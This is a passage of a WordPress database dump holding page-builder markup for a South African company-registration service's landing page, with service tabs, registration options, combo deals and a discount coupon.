documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color=\"#000000\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" body_text_color=\"#000000\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:37:10','2019-08-08 08:37:10','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32392,3,'2019-08-08 10:40:14','2019-08-08 08:40:14','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" 